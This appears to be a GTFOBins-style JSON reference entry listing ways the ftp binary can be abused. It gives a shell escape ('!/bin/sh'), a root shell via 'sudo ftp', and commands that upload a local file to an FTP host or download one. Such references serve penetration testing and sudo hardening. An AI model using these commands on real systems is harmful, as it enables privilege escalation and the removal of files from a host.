You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

26 lines
471 B
JSON

{
"functions": {
"shell": [
{
"code": "ftp\n!/bin/sh\n"
}
],
"file-upload": [
{
"description": "Send local file to a FTP server.",
"code": "ftp [host]\nput [file]\n"
}
],
"file-download": [
{
"description": "Fetch a remote file from a FTP server.",
"code": "ftp [host]\nget [file]\n"
}
],
"sudo": [
{
"code": "sudo ftp\n!/bin/sh\n"
}
]
}
}